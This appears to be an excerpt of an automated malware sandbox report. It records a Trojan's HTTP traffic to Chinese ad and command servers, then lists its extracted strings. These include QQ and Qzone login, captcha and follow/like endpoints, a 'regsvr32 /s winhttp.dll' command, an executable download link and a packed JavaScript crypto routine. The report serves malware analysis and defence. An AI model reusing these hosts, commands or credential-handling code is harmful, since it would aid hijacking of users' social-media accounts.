 Wed, 22 Mar 2017 01:08:37 GMT..X-Swift-CacheTime: 1..Timing-Allow-Ori
gin: *..EagleId: 2f59411814901448766361688e..



GET /ad/ssggd.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/ad/ssggd.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 106
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssggd.htm
Last-Modified: Fri, 06 Jan 2017 15:11:59 GMT
Accept-Ranges: bytes
ETag: "147f493a2f68d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:41 GMT
................................................4.9...................
.........,..........................HTTP/1.1 200 OK..Content-Length: 1
06..Content-Type: text/html..Content-Location: hXXp://123.51pc114.cn/a
d/ssggd.htm..Last-Modified: Fri, 06 Jan 2017 15:11:59 GMT..Accept-Rang
es: bytes..ETag: "147f493a2f68d21:948"..Server: IIS..Date: Wed, 22 Mar
 2017 01:07:41 GMT..................................................4.
9............................,..............................


GET /ad/ssxs11.htm HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 825
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxs11.htm
Last-Modified: Mon, 16 Jan 2017 15:57:20 GMT
Accept-Ranges: bytes
ETag: "070cb371170d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:41 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>..............................<script language="javascri
pt" type="text/javascript" src="hXXp://js.users.51.la/19059730.js">
</script>..<noscript><a href="hXXp://VVV.51.la/?1905973
0" target="_blank"><img alt="我要啦免&#x
8D39;统计" src="hXXp://img.users.51.la/19059730.asp" style
="border:none" /></a></noscript>....</body>..<
/html>......


GET /ad/mcgg.htm HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/mcgg.htm
Last-Modified: Thu, 28 Mar 2013 03:33:01 GMT
Accept-Ranges: bytes
ETag: "8222f3642bce1:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:41 GMT
<meta HTTP-EQUIV=REFRESH CONTENT="0;URL=hXXp://ad.7532.com/ad/mcgg4
56.htm">....


GET /ad/ssxszgg1.htm HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 2915
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxszgg1.htm
Last-Modified: Fri, 06 Jan 2017 15:12:34 GMT
Accept-Ranges: bytes
ETag: "8c63f64e2f68d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>.. <br />..<font  size="2" color="red"><a hr
ef="hXXp://url.cn/OGLodN"  target="_blank">................28......
............:</a></font><font  size="2" color="red">
..<br />..<font  size="2" color="blue"><a href="hXXp://
km.7532.com"  target="_blank">............1-3........1........10..4
..................1-10......................7532......</a></f
ont><font  size="2" color="blue"><br />..<br />..
<a href="hXXp://VVV.7532.com/" target="_blank" ..style="color:#0000
ff"><strong>..<br />...................................
.....4.9............................,..........................</st
rong></a>..<br />..<a href="hXXp://VVV.7532.com/" ta
rget="_blank" ..style="color:#ff0000"><strong>........<br 
/>..<br />..1........................,....................<
;br />..2..........................................................
.......</strong></a>....<br />....<br />..
<<< skipped >>>


GET /1435675/tongji.js HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.tongji.linezing.com
Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable
Server: Tengine
Content-Length: 0
Connection: keep-alive
Via: cache34.l2hk1[0,503-0,M], cache1.l2hk1[10023,0], cache10.it1[10679,503-0,M], cache3.it1[30000,10679,504001]
Age: 0
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 22 Mar 2017 01:08:38 GMT
X-Swift-CacheTime: 1
Timing-Allow-Origin: *
EagleId: 2f59410314901448775867203e
HTTP/1.1 503 Service Temporarily Unavailable..Server: Tengine..Content
-Length: 0..Connection: keep-alive..Via: cache34.l2hk1[0,503-0,M], cac
he1.l2hk1[10023,0], cache10.it1[10679,503-0,M], cache3.it1[30000,10679
,504001]..Age: 0..



GET /4473463.js HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1872
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Mar 2017 03:16:45 GMT
Accept-Ranges: bytes
ETag: "6cedff3ff196d21:5590"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 22 Mar 2017 01:07:36 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?4473463" target="_blank
" title="51.La 网站流量统计系
;统">网站统计</a>\n');..var a34
63tf="51la";var a3463pu="";var a3463pf="51la";var a3463su=window.locat
ion;var a3463sf=document.referrer;var a3463of="";var a3463op="";var a3
463ops=1;var a3463ot=1;var a3463d=new Date();var a3463color="";if (nav
igator.appName=="Netscape"){a3463color=screen.pixelDepth;} else {a3463
color=screen.colorDepth;}..try{a3463tf=top.document.referrer;}catch(e)
{}..try{a3463pu =window.parent.location;}catch(e){}..try{a3463pf=windo
w.parent.document.referrer;}catch(e){}..try{a3463ops=document.cookie.m
atch(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3463ops=(a3463o
ps==null)?1: (parseInt(unescape((a3463ops)[2])) 1);var a3463oe =new Da
te();a3463oe.setTime(a3463oe.getTime() 60*60*1000);document.cookie="AJ
STAT_ok_pages=" a3463ops  ";path=/;expires=" a3463oe.toGMTString();a34
63ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|
$)"));if(a3463ot==null){a3463ot=1;}else{a3463ot=parseInt(unescape((a34
63ot)[2])); a3463ot=(a3463ops==1)?(a3463ot 1):(a3463ot);}a3463oe.setTi
me(a3463oe.getTime() 365*24*60*60*1000);document.cookie="AJSTAT_ok_tim
es=" a3463ot ";path=/;expires=" a3463oe.toGMTString();}catch(e){}..try
{if(document.cookie==""){a3463ops=-1;a3463ot=-1;}}catch(e){}..a3463of=
a3463sf;if(a3463pf!=="51la"){a3463of=a3463pf;}if(a3463tf!=="51la"){a34
63of=a3463tf;}a3463op=a3463pu;try{lainframe}catch(e){a3463op=a3463
<<< skipped >>>


GET /ad/gjgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 15198
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/gjgg.htm
Last-Modified: Tue, 21 Jun 2016 02:14:19 GMT
Accept-Ranges: bytes
ETag: "8228749e62cbd11:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<meta
 name="keywords" content="QQ...."/>..<meta name="description" co
ntent="QQ...."/>..<title>............</title>..<styl
e type="text/css">..<!--...STYLE1 {color: #0000FF}...STYLE2 {fon
t-size: 12px}...STYLE6 {color: #FFFFFF}..-->..</style>..</
head>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..&
lt;html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<me
ta http-equiv="Content-Type" content="text/html; charset=gb2312" />
..<title>QQ..............</title>..<style type="text/cs
s">..<!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}..
.STYLE6 {color: #FFFFFF}..-->..</style>..</head>..<h
tml>..<body>..<body>......<table width="250" border=
"0">..<tr>..<tr>..<tr>..<tr>..    <td cl
ass="STYLE2"> <span class="STYLE1"><a href="hXXp://VVV.753
2.com/" target="_blank" style="color:#FE0000;" onMouseOver="this.style
.color='#FE0000';" onMouseOut="this.style.color='#FE0000';">......Q
Q......................</a></span></td>..    <td&
gt;<span class="STYLE2">[<span class="STYLE1">........
<<< skipped >>>


GET /ad/mcgg456.htm HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ad.7532.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 4406
Content-Type: text/html
Content-Location: hXXp://ad.7532.com/ad/mcgg456.htm
Last-Modified: Wed, 02 Mar 2016 05:01:52 GMT
Accept-Ranges: bytes
ETag: "a8b4a0a24074d11:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:44 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<meta
 name="keywords" content="QQ...."/>..<meta name="description" co
ntent="QQ...."/>..<title>............</title>..<styl
e type="text/css">..<!--...STYLE1 {color: #0000FF}..body,td,th {
...font-size: 12px;..}...STYLE2 {color: #FF0000}..-->..</style&g
t;..</head>..<html>..<body>........<table width="
494" border="0" cellpadding="0" cellspacing="0">..  <!--DWLayout
Table-->..  <tr>..    <td width="494" height="708" align="
left" valign="top"><table width="236" height="221">..     <
;tr>  <tr>.... </tr>....<tr>..    <tr>..   
     <td height="14" align="left" valign="middle"><a href="ht
tp://shop107817006.taobao.com" target="_blank" style="color:#FF00FF;" 
onmouseover="this.style.color='#FF00FF';" onmouseout="this.style.color
='#FF00FF';">........................</a></td>..       
 <td height="14"><span class="STYLE1">[........]</span&
gt;</td>..      </tr>..<tr>..        <td height="
14" align="left" valign="middle"><a href="hXXp://down.cncpa.net:
9000/mmliao/MM-liao8869.exe" target="_blank" style="color:#2222f0;" on
MouseOver="this.style.color='#2222f0F';" onMouseOut="this.style.co
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3404:

.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
}?9\$0~9
u$SShe
iu2.iu
dc.dll
ole32.dll
kernel32.dll
wininet.dll
SkinH_EL.dll
advapi32.dll
user32.dll
MsgWaitForMultipleObjects
ReportError
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
WebBrowser
hXXp://VVV.7532.com/forum-49-1.html
O;.lQ5"
ytv%c]`
hXXp://VVV.7532.com
WinHttp.WinHttpRequest.5.1
8926356713
hXXp://api.t.qq.com/qzApp/appHomePage.php?index=1&home=1&apiType=5&g_tk=
hXXp://z.t.qq.com/mb/qzone/index.html
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
"loginedUser"
MSXML2.ServerXMLHTTP.6.0
MSXML2.ServerXMLHTTP.5.0
application/x-www-form-urlencoded
hXXp://api.t.qq.com/old/follow.php
hXXp://api.t.qq.com/proxy.html
hXXp://z.t.qq.com/mb/qzone/index.html#
&veriCode=&lieuId=&apiType=5&apiHost=http://api.t.qq.com&g_tk=
&apiType=5&apiHost=http://api.t.qq.com&_r=
hXXp://api.t.qq.com/qzApp/appUserTweets.php?filter=0&uid=
hXXp://api.t.qq.com/old/unfollow.php
hXXp://ad.51pc114.cn/setup/yinyue.html
.html
hXXp://y.qq.com/y/static/singer/
&loginUin=
hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_add.fcg?singermid=
hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_getnum.fcg?singermid=
hXXp://ad.51pc114.cn/setup/ssxczgg2269.txt
hXXp://VVV.7532.com/thread-143613-1-1.html
122.228.204.12
hXXp://blog.sina.com.cn/s/blog_81b5163c0102vw7z.html
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://123.51pc114.cn/ad/ssggd.htm
Adodb.Stream
fJ.WM_
CX%xm
Õ6m*
n.BjCw
%s;7*
0%x@w
%C^L:
%s T5
]E4%F(
.Funr
k%UPp
fg.VG
%C',@
>Ùd
0'.Ll
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
*.Ea]S
Q.CGo
fTpe
.LLbX
-.Mdl
\-A}=3K
Y:.akpS
$.Zcqn
.WE= T!N
#?%s(C(
u.Jck~
zx/%FN[
%s=\RI
}j%c%Y)
Rx.GR
4o#.dM
IeS`%C
[n 4\.UY 
,4.qO,
gQ'.Io
%cLur?
s%DHB
]I%%X
5r.US
:mD].tB
f%fUZ
.fOuV12
*_.dC
&-N}<
({?.cQm
.Cqx~c
.`.Qw
**.dU
!n]%x
%X,Cr
&.PFy{xh
.um ZZE7L
/^p%u$
I.NoQY
zu.ew
D/.nT
b\SkinH_EL.dll
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
51pc114.cn
123.51pc114.cn
hXXp://123.51pc114.cn/setup/ssxsz.htm
Www.7532.com
hXXp://km.7532.com
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
/mood/
.1&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
/&opuin=
qzreferrer=http://user.qzone.qq.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
mailto:shenglin_yu@126.com
hXXp://qlogo2.store.qq.com/qzone/
hXXp://ad.51pc114.cn/setup/ssxczgg9976.txt
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
hXXp://tjalist.photo.qzone.qq.com/fcgi-bin/fcg_list_album_v3?g_tk=
hXXp://123.51pc114.cn/setup/QQssxs.html
&qzreferrer=http://ctc.qzs.qq.com/qzone/photo/v7/page/photo.html?init=photo.v7/module/photoList2/index&navBar=1&normal=1&aid=
/photo/
&curkey=http://user.qzone.qq.com/
unikey=http://user.qzone.qq.com/
\dc.dll
@.reloc
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
KERNEL32.dll
GdiplusShutdown
gdiplus.dll
WSOCK32.dll
MSVCP60.dll
ReportError_A
VBYB_ReportError
VB_ReportError
uu_loginA
uu_loginW
uu_reportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
hXXp://ad.51pc114.cn/setup/a.html
regsvr32 /s winhttp.dll
WinHttp
&appid=549000912&js_ver=10136&js_type=1&login_sig=kfeUZrYNBwRRGcymoO5RMcqKXaknId-Z7Pju9ufQQM5CYzbfYStee8y5nnsqAJuP&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.25413458029055885
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
hXXp://captcha.qq.com/cap_union_show?clientype=2&uin=
hXXp://captcha.qq.com/getimgbysig?aid=549000912&uin=
&0.10107533859643092
hXXp://captcha.qq.com/cap_union_verify?aid=549000912&uin=
&0.05596214901416252
hXXp://captcha.qq.com/getQueSig?aid=715030901&uin=
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=8-30-1445255935887&js_ver=10136&js_type=1&login_sig=kfeUZrYNBwRRGcymoO5RMcqKXaknId-Z7Pju9ufQQM5CYzbfYStee8y5nnsqAJuP&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
hXXp://ptlogin2.qq.com/login?u=
hXXp://user.qzone.qq.com/
.1^||^http://qzs.qq.com/qzone/client/&face=0&fupdate=1&g_tk=
hXXp://user.qzone.qq.com/p/r/cgi-bin/user/qz_opcnt2?_stp=
function time(){return new Date().getTime()}
<.>http://user.qzone.qq.com/
&refer=qzone&plat=qzone&json_esc=1&output_type=json&unikey=http://user.qzone.qq.com/
hXXp://r.qzone.qq.com/cgi-bin/user/qz_opcnt2?g_tk=
skey
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('Y 1O=X(){X r(){W.n=1d;W.e=0;W.4V=W.3h=W.4k=W.q=W.p=W.d=1d}X B(r,z,I){1d!=r&&("50"==2W r?W.3i(r,z,I):1d==z&&"3T"!=2W r?W.1S(r,1B):W.1S(r,z))}X z(){Z 1u B(1d)}X A(r){Y V=z();V.2c(r);Z V}X D(r){Y z=1,I;0!=(I=r>>>16)&&(r=I,z =16);0!=(I=r>>8)&&(r=I,z =8);0!=(I=r>>4)&&(r=I,z =4);0!=(I=r>>2)&&(r=I,z =2);0!=r>>1&&(z =1);Z z}X C(r){W.m=r}X E(r){W.m=r;W.2a=r.2V();W.2f=W.2a&1N;W.2U=W.2a>>15;W.2T=(1<<r.1e-15)-1;W.2S=2*r.t}X F(){Y r=(1u 3k).3G();L[G  ]^=r&1f;L[G  ]^=r>>8&1f;L[G  ]^=r>>16&1f;L[G  ]^=r>>24&1f;G>=U&&(G-=U)}X O(){}X N(){W.j=W.i=0;W.S=[]}r.1b.2R=X(r){Z r.2Q(W.e,W.n)};r.1b.2P=X(r,z){1d!=r&&1d!=z&&0<r.1c&&0<z.1c?(W.n=1u B(r,16),W.e=1T(z,16)):2O("3l 1O 3p 3r")};r.1b.26=X(r){Y z;z=W.n.2N() 7>>3;1a(z<r.1c 11)2O("3a 3c 3f 19 1O"),z=1d;1h{19(Y I=[],A=r.1c-1;0<=A&&0<z;){Y D=r.1C(A--);I[--z]=D}I[--z]=0;r=1u O;19(A=[];2<z;){19(A[0]=0;0==A[0];)r.2M(A);I[--z]=A[0]}I[--z]=2;I[--z]=0;z=1u B(I)}1a(1d==z)Z 1d;z=W.2R(z);1a(1d==z)Z 1d;z=z.1F(16);Z 0==(z.1c&1)?z:"0" z};Y H;B.1b.1z=X(r,z,A,B,D,C){Y E=z&1N;19(z>>=15;0<=--C;){Y R=W[r]&1N,F=W[r  ]>>15,G=z*R F*E,R=E*R ((G&1N)<<15) A[B] (D&2L);D=(R>>>30) (G>>>15) z*F (D>>>30);A[B  ]=R&2L}Z D};H=30;B.1b.1e=H;B.1b.1s=(1<<H)-1;B.1b.1o=1<<H;B.1b.2K=1p.3d(2,52);B.1b.27=52-H;B.1b.29=2*H-52;Y S=[],K;H=48;19(K=0;9>=K;  K)S[H  ]=K;H=3n;19(K=10;36>K;  K)S[H  ]=K;H=3D;19(K=10;36>K;  K)S[H  ]=K;C.1b.2e=X(r){Z 0>r.s||0<=r.1H(W.m)?r.2J(W.m):r};C.1b.2m=X(r){Z r};C.1b.1A=X(r){r.1Q(W.m,1d,r)};C.1b.1V=X(r,z,A){r.1X(z,A);W.1A(A)};C.1b.1Y=X(r,z){r.25(z);W.1A(z)};E.1b.2e=X(r){Y A=z();r.1w().1L(W.m.t,A);A.1Q(W.m,1d,A);0>r.s&&0<A.1H(B.1x)&&W.m.1m(A,A);Z A};E.1b.2m=X(r){Y A=z();r.1I(A);W.1A(A);Z A};E.1b.1A=X(r){19(;r.t<=W.2S;)r[r.t  ]=0;19(Y z=0;z<W.m.t;  z){Y A=r[z]&1N,B=A*W.2f ((A*W.2U (r[z]>>15)*W.2f&W.2T)<<15)&r.1s,A=z W.m.t;19(r[A] =W.m.1z(0,B,r,z,0,W.m.t);r[A]>=r.1o;)r[A]-=r.1o,r[  A]  }r.1q();r.2b(W.m.t,r);0<=r.1H(W.m)&&r.1m(W.m,r)};E.1b.1V=X(r,z,A){r.1X(z,A);W.1A(A)};E.1b.1Y=X(r,z){r.25(z);W.1A(z)};B.1b.1I=X(r){19(Y z=W.t-1;0<=z;--z)r[z]=W[z];r.t=W.t;r.s=W.s};B.1b.2c=X(r){W.t=1;W.s=0>r?-1:0;0<r?W[0]=r:-1>r?W[0]=r 1o:W.t=0};B.1b.1S=X(r,z){Y A;1a(16==z)A=4;1h 1a(8==z)A=3;1h 1a(1B==z)A=8;1h 1a(2==z)A=1;1h 1a(32==z)A=5;1h 1a(4==z)A=2;1h{W.3I(r,z);Z}W.s=W.t=0;19(Y D=r.1c,C=!1,E=0;0<=--D;){Y J;8==A?J=r[D]&1f:(J=S[r.1C(D)],J=1d==J?-1:J);0>J?"-"==r.1l(D)&&(C=!0):(C=!1,0==E?W[W.t  ]=J:E A>W.1e?(W[W.t-1]|=(J&(1<<W.1e-E)-1)<<E,W[W.t  ]=J>>W.1e-E):W[W.t-1]|=J<<E,E =A,E>=W.1e&&(E-=W.1e))}8==A&&0!=(r[0]&2I)&&(W.s=-1,0<E&&(W[W.t-1]|=(1<<W.1e-E)-1<<E));W.1q();C&&B.1x.1m(W,W)};B.1b.1q=X(){19(Y r=W.s&W.1s;0<W.t&&W[W.t-1]==r;)--W.t};B.1b.1L=X(r,z){Y A;19(A=W.t-1;0<=A;--A)z[A r]=W[A];19(A=r-1;0<=A;--A)z[A]=0;z.t=W.t r;z.s=W.s};B.1b.2b=X(r,z){19(Y A=r;A<W.t;  A)z[A-r]=W[A];z.t=1p.4R(W.t-r,0);z.s=W.s};B.1b.2k=X(r,z){Y A=r%W.1e,B=W.1e-A,D=(1<<B)-1,C=1p.1P(r/W.1e),E=W.s<<A&W.1s,F;19(F=W.t-1;0<=F;--F)z[F C 1]=W[F]>>B|E,E=(W[F]&D)<<A;19(F=C-1;0<=F;--F)z[F]=0;z[C]=E;z.t=W.t C 1;z.s=W.s;z.1q()};B.1b.2n=X(r,z){z.s=W.s;Y A=1p.1P(r/W.1e);1a(A>=W.t)z.t=0;1h{Y B=r%W.1e,D=W.1e-B,C=(1<<B)-1;z[0]=W[A]>>B;19(Y E=A 1;E<W.t;  E)z[E-A-1]|=(W[E]&C)<<D,z[E-A]=W[E]>>B;0<B&&(z[W.t-A-1]|=(W.s&C)<<D);z.t=W.t-A;z.1q()}};B.1b.1m=X(r,z){19(Y A=0,B=0,D=1p.3b(r.t,W.t);A<D;)B =W[A]-r[A],z[A  ]=B&W.1s,B>>=W.1e;1a(r.t<W.t){19(B-=r.s;A<W.t;)B =W[A],z[A  ]=B&W.1s,B>>=W.1e;B =W.s}1h{19(B =W.s;A<r.t;)B-=r[A],z[A  ]=B&W.1s,B>>=W.1e;B-=r.s}z.s=0>B?-1:0;-1>B?z[A  ]=W.1o B:0<B&&(z[A  ]=B);z.t=A;z.1q()};B.1b.1X=X(r,z){Y A=W.1w(),D=r.1w(),C=A.t;19(z.t=C D.t;0<=--C;)z[C]=0;19(C=0;C<D.t;  C)z[C A.t]=A.1z(0,D[C],z,C,0,A.t);z.s=0;z.1q();W.s!=r.s&&B.1x.1m(z,z)};B.1b.25=X(r){19(Y z=W.1w(),A=r.t=2*z.t;0<=--A;)r[A]=0;19(A=0;A<z.t-1;  A){Y B=z.1z(A,z[A],r,2*A,0,1);(r[A z.t] =z.1z(A 1,2*z[A],r,2*A 1,B,z.t-A-1))>=z.1o&&(r[A z.t]-=z.1o,r[A z.t 1]=1)}0<r.t&&(r[r.t-1] =z.1z(A,z[A],r,2*A,0,1));r.s=0;r.1q()};B.1b.1Q=X(r,A,C){Y E=r.1w();1a(!(0>=E.t)){Y F=W.1w();1a(F.t<E.t)1d!=A&&A.2c(0),1d!=C&&W.1I(C);1h{1d==C&&(C=z());Y M=z(),J=W.s;r=r.s;Y G=W.1e-D(E[E.t-1]);0<G?(E.2k(G,M),F.2k(G,C)):(E.1I(M),F.1I(C));E=M.t;F=M[E-1];1a(0!=F){Y H=F*(1<<W.27) (1<E?M[E-2]>>W.29:0),K=W.2K/H,H=(1<<W.27)/H,L=1<<W.29,Q=C.t,N=Q-E,P=1d==A?z():A;M.1L(N,P);0<=C.1H(P)&&(C[C.t  ]=1,C.1m(P,C));B.1U.1L(E,P);19(P.1m(M,M);M.t<E;)M[M.t  ]=0;19(;0<=--N;){Y O=C[--Q]==F?W.1s:1p.1P(C[Q]*K (C[Q-1] L)*H);1a((C[Q] 